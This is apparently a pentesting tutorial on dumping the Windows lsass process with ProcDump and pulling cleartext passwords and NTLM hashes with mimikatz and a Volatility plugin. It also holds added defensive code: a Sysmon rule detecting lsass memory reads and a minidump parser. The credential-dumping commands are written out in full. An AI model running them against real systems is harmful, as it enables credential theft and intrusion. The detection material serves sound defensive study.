Using Mimikatz to get cleartext passwords from an offline memory dump

Requirements:

  1. a recent version of Kali
  2. mimikatz: wget

This applies in case you found an offline dump, or you were able to dump the lsass process yourself using ProcDump.

The technique can be used in pentesting to obtain cleartext passwords from a server without running "malicious" code on it, since mimikatz itself is flagged by most AV. In this way we avoid having to deal with antivirus evasion techniques and other headaches.

ProcDump, on the other hand, is a tool developed by Mark Russinovich that lets us dump the memory space of a process to a file.

Note: to take the dump you require system privileges.

# For 32 bits
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# For 64 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
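From the defender's side, the ProcDump step above is also what leaves a trace: a process opens a handle to lsass.exe with memory-read rights. The rule below is an added example (not from the original post) that scans Sysmon Event ID 10 (ProcessAccess) records, which log the SourceImage, TargetImage and GrantedAccess mask of every such handle, and flags reads of lsass memory by anything outside an allowlist. The XML events and the allowlisted sensor path are constructed sample data; the access-mask constants are the documented Win32 values.

```python
# Added example: detect lsass memory reads in Sysmon Event ID 10 records.
# The sample events and the allowlist path below are constructed, not real logs.
import xml.etree.ElementTree as ET
from typing import Dict, List

PROCESS_VM_READ = 0x0010        # right required to read another process's memory
PROCESS_ALL_ACCESS = 0x1FFFFF   # full-access mask that dump tools typically request

# Hypothetical processes permitted to read lsass in this environment (e.g. an
# EDR sensor). Placeholder path; replace with your own inventory.
ALLOWLIST = {r"c:\program files\exampleedr\sensor.exe"}

# Constructed Sysmon events in a simplified EventData layout.
SAMPLE_EVENTS = r"""<Events>
<Event><System><EventID>10</EventID></System><EventData>
<Data Name="SourceImage">C:\temp\procdump.exe</Data>
<Data Name="TargetImage">C:\Windows\System32\lsass.exe</Data>
<Data Name="GrantedAccess">0x1FFFFF</Data></EventData></Event>
<Event><System><EventID>10</EventID></System><EventData>
<Data Name="SourceImage">C:\Program Files\ExampleEDR\sensor.exe</Data>
<Data Name="TargetImage">C:\Windows\System32\lsass.exe</Data>
<Data Name="GrantedAccess">0x1FFFFF</Data></EventData></Event>
<Event><System><EventID>10</EventID></System><EventData>
<Data Name="SourceImage">C:\Windows\System32\taskmgr.exe</Data>
<Data Name="TargetImage">C:\Windows\System32\lsass.exe</Data>
<Data Name="GrantedAccess">0x1400</Data></EventData></Event>
<Event><System><EventID>10</EventID></System><EventData>
<Data Name="SourceImage">C:\temp\procdump.exe</Data>
<Data Name="TargetImage">C:\Windows\System32\notepad.exe</Data>
<Data Name="GrantedAccess">0x1FFFFF</Data></EventData></Event>
<Event><System><EventID>1</EventID></System><EventData>
<Data Name="Image">C:\temp\procdump.exe</Data></EventData></Event>
<Event><System><EventID>10</EventID></System><EventData>
<Data Name="SourceImage">C:\Users\Public\tool.exe</Data>
<Data Name="TargetImage">C:\Windows\System32\lsass.exe</Data>
<Data Name="GrantedAccess">0x1010</Data></EventData></Event>
</Events>"""


def lsass_access_alerts(events_xml: str) -> List[Dict[str, str]]:
    """Return one alert per ProcessAccess event that reads lsass memory."""
    alerts = []
    for ev in ET.fromstring(events_xml).iter("Event"):
        if ev.findtext("System/EventID") != "10":
            continue  # only ProcessAccess events carry GrantedAccess
        data = {d.get("Name"): (d.text or "") for d in ev.iter("Data")}
        source = data.get("SourceImage", "").lower()
        target = data.get("TargetImage", "").lower()
        access = int(data.get("GrantedAccess", "0"), 16)
        if not target.endswith("\\lsass.exe"):
            continue
        if not access & PROCESS_VM_READ:
            continue  # query-only handles cannot read memory; ignore them
        if source in ALLOWLIST:
            continue
        full = (access & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS
        alerts.append({
            "source": source,
            "target": target,
            "access": hex(access),
            "severity": "high" if full else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in lsass_access_alerts(SAMPLE_EVENTS):
        print(alert)
```

The rule keys on the PROCESS_VM_READ bit rather than on one exact mask, so a handle requesting only 0x1010 is still caught while the many benign query-only handles to lsass are not; the allowlist is the place to suppress your own tooling.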

Download the generated lsass.dmp file.
Launch mimikatz (alpha) against the lsass.dmp file with the commands:

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
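The "Switch to MINIDUMP" message reflects that a ProcDump output is a Windows minidump, which is a different container from the full physical memory image handled by Volatility later in this post. When triaging a dump of unknown origin it helps to check the container first. The parser below is an added example, not code from the original post: it reads the documented MINIDUMP_HEADER and MINIDUMP_DIRECTORY structures, validates that every stream lies inside the file, and reports whether the dump carries the memory and module streams a minidump-based analysis needs. The sample dump it builds is synthetic, not a real lsass dump.

```python
# Added example: identify a minidump by its header and list its streams.
# Structure layout follows the Windows MINIDUMP_HEADER / MINIDUMP_DIRECTORY
# definitions; the sample file built here is constructed test data.
import struct
from typing import Dict, List, Tuple

MINIDUMP_SIGNATURE = 0x504D444D   # ASCII "MDMP" read as little-endian
MINIDUMP_VERSION = 0xA793         # low word of the Version field
HEADER_FMT = "<IIIIIIQ"           # Signature, Version, NumberOfStreams,
                                  # StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
HEADER_SIZE = struct.calcsize(HEADER_FMT)          # 32 bytes
DIRECTORY_FMT = "<III"            # StreamType, Location.DataSize, Location.Rva
DIRECTORY_SIZE = struct.calcsize(DIRECTORY_FMT)    # 12 bytes

# Stream types worth naming when describing a process dump.
STREAM_NAMES: Dict[int, str] = {
    3: "ThreadListStream",
    4: "ModuleListStream",
    5: "MemoryListStream",
    7: "SystemInfoStream",
    9: "Memory64ListStream",
    15: "MiscInfoStream",
    16: "MemoryInfoListStream",
}


def parse_minidump_directory(data: bytes) -> List[Tuple[int, int, int]]:
    """Return (StreamType, DataSize, Rva) for each directory entry.

    Raises ValueError when the buffer is not a structurally valid minidump.
    """
    if len(data) < HEADER_SIZE:
        raise ValueError("file shorter than MINIDUMP_HEADER")
    sig, version, n_streams, dir_rva, _csum, _ts, _flags = struct.unpack_from(
        HEADER_FMT, data, 0)
    if sig != MINIDUMP_SIGNATURE:
        raise ValueError("missing MDMP signature")
    if version & 0xFFFF != MINIDUMP_VERSION:
        raise ValueError("unexpected version word 0x%04x" % (version & 0xFFFF))
    if dir_rva + n_streams * DIRECTORY_SIZE > len(data):
        raise ValueError("stream directory runs past end of file")
    entries = []
    for i in range(n_streams):
        stype, size, rva = struct.unpack_from(
            DIRECTORY_FMT, data, dir_rva + i * DIRECTORY_SIZE)
        if rva + size > len(data):
            raise ValueError("stream %d (type %d) points outside the file" % (i, stype))
        entries.append((stype, size, rva))
    return entries


def classify_dump(data: bytes) -> str:
    """'not-minidump' for anything else (e.g. a full physical memory image)."""
    try:
        entries = parse_minidump_directory(data)
    except ValueError:
        return "not-minidump"
    types = {t for t, _, _ in entries}
    # A usable process dump needs memory ranges (32- or 64-bit list) plus the
    # module list used to locate the loaded DLLs inside those ranges.
    if types & {5, 9} and 4 in types:
        return "minidump-with-memory"
    return "minidump-without-memory"


def describe_streams(data: bytes) -> List[str]:
    return [STREAM_NAMES.get(t, "Stream%d" % t)
            for t, _, _ in parse_minidump_directory(data)]


def build_sample_minidump(stream_types: List[int]) -> bytes:
    """Construct a tiny synthetic minidump with 4-byte dummy streams (test data)."""
    n = len(stream_types)
    dir_rva = HEADER_SIZE
    payload_rva = dir_rva + n * DIRECTORY_SIZE
    header = struct.pack(HEADER_FMT, MINIDUMP_SIGNATURE, 0x0001A793, n, dir_rva, 0, 0, 0)
    directory = b"".join(
        struct.pack(DIRECTORY_FMT, t, 4, payload_rva + 4 * i)
        for i, t in enumerate(stream_types))
    return header + directory + b"\0" * (4 * n)


if __name__ == "__main__":
    sample = build_sample_minidump([7, 4, 9, 15])
    print(classify_dump(sample), describe_streams(sample))
    print(classify_dump(b"\0" * 4096))
```

A full memory image produced by a hypervisor or acquisition tool has no MDMP header and comes back as "not-minidump", which is the cue to reach for Volatility with a matching profile instead.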

In case of a full memory dump you can follow the reference: , which I did not try myself but should work in VirtualBox:

-------

Now let's dig into Volatility and mimikatz.

By default Volatility does not ship with the mimikatz plugin, so you need to install it into a plugins directory and point Volatility at it:

  1. cd /usr/share/volatility
  2. mkdir plugins
  3. cd plugins
  4. wget
  5. apt-get install python-crypto
  6. volatility --plugins=/usr/share/volatility/plugins --profile=Win7SP0x86 -f halomar.dmp mimikatz

Here halomar.dmp is the memory dump file, and the --profile value must match the Windows version the dump was taken from (Win7SP0x86 in this case).

If you need the NTLM hashes:

volatility --plugins=/usr/share/volatility/plugins --profile=Win7SP0x86 -f ~/Desktop/ctf/halomar.dmp hashdump

That's it, I did learn something new... hope you do too.
